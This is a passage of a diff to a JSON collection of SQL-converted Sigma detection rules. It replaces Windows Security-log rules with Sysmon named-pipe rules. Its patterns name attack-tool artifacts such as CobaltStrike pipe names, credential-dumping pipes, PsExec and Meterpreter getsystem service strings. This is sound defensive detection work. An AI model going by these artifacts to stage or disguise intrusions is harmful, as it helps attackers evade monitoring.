'\\'))" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "PowerShell Execution Via Named Pipe", + "id": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\')" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_powershell_execution_pipe.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "PAExec Default Named Pipe", + "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "status": "test", - "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects PAExec default named pipe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PAExec%' ESCAPE '\\')" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_paexec_default_pipe.yml" }, { - "title": "Addition of SID History to Active Directory Object", - "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "status": "stable", - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "author": "Thomas Patzke, @atc_project (improvements)", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "status": "test", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1134.005" + "attack.t1055" ], "falsepositives": [ - "Migration of an account into a new domain" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE 
'\\'))) AND NOT (SidHistory = ''))))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_security_susp_add_sid_history.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Suspicious Remote Logon with Explicit Credentials", - "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", - "status": "experimental", - "description": "Detects suspicious processes logging on 
with explicit credentials", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "status": "test", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.t1078", - "attack.lateral_movement" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Administrators that use the RunAS command or scheduled tasks" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" ], - "filename": "win_security_susp_logon_explicit_credentials.yml" 
+ "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "Account Tampering - Suspicious Failed Logon Reasons", - "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "status": "experimental", - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "User using a disabled account" + "Rare legitimate use of psexec from the locations mentioned above" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_failed_logon_reasons.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Windows Network Access Suspicious 
desktop.ini Action", - "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "status": "test", - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "author": "Tim Shelton (HAWK.IO)", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation" ], "falsepositives": [ - "Read only access list authority" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" ], - "filename": "win_security_net_share_obj_susp_desktop_ini.yml" + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" }, { - "title": "User Logoff Event", - "id": "0badd08f-c6a3-4630-90d3-6875cca440be", + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", "status": "experimental", - "description": "Detects a user log-off activity. 
Could be used for example to correlate information during forensic investigations", - "author": "frack113", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], "falsepositives": [ "Unknown" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4634', '4647'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_user_logoff.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", + "title": "PsExec Default Named Pipe", + "id": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\')" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": 
"pipe_created_psexec_default_pipe.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability", - "id": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "title": "Alternate PowerShell Hosts Pipe", + "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject", - "author": "Orlinum , BlueDefenZer", + "description": "Detects alternate PowerShell hosts potentially bypassing 
detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Programs using PowerShell directly without invocation of a dedicated interpreter." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR Image LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR Image LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (Image = '') OR (Image LIKE '%:\\\\Program Files%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" ], - "filename": 
"win_security_adcs_certificate_template_configuration_vulnerability.yml" + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" }, { - "title": "WMI Persistence - Security", - "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "title": "PsExec Pipes Artifacts", + "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Legitimate Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\'))" ], - "filename": "win_security_wmi_persistence.yml" + "filename": "pipe_created_psexec_pipes_artifacts.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - Security", - "id": "c8b00925-926c-47e3-beea-298fd563728e", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", "status": "experimental", - "description": "Detects service installation of different remote access tools software. 
These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE 
'%\\\\imposingcost%' ESCAPE '\\'))" ], - "filename": "win_security_service_install_remote_access_software.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" + ], + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + }, + { + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "status": "experimental", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ], + "falsepositives": [ + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE 
'\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious Access to Sensitive File Extensions", - "id": "91c945bc-2ad1-4799-a591-4d00198a1215", + "title": "Sysmon Configuration Change", + "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "status": "test", - "description": "Detects known sensitive file extensions accessed on a network share", - "author": "Samir Bousseaden", + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1039" + "attack.defense_evasion" ], "falsepositives": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" + "Legitimate administrative action" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' 
ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" ], - "filename": "win_security_susp_raccess_sensitive_fext.yml" + "filename": "sysmon_config_modification.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. 
Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Secure Deletion with SDelete", - "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", - "status": "test", - "description": "Detects renaming of file while deletion with SDelete tool.", - "author": "Thomas Patzke", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.impact", "attack.defense_evasion", - 
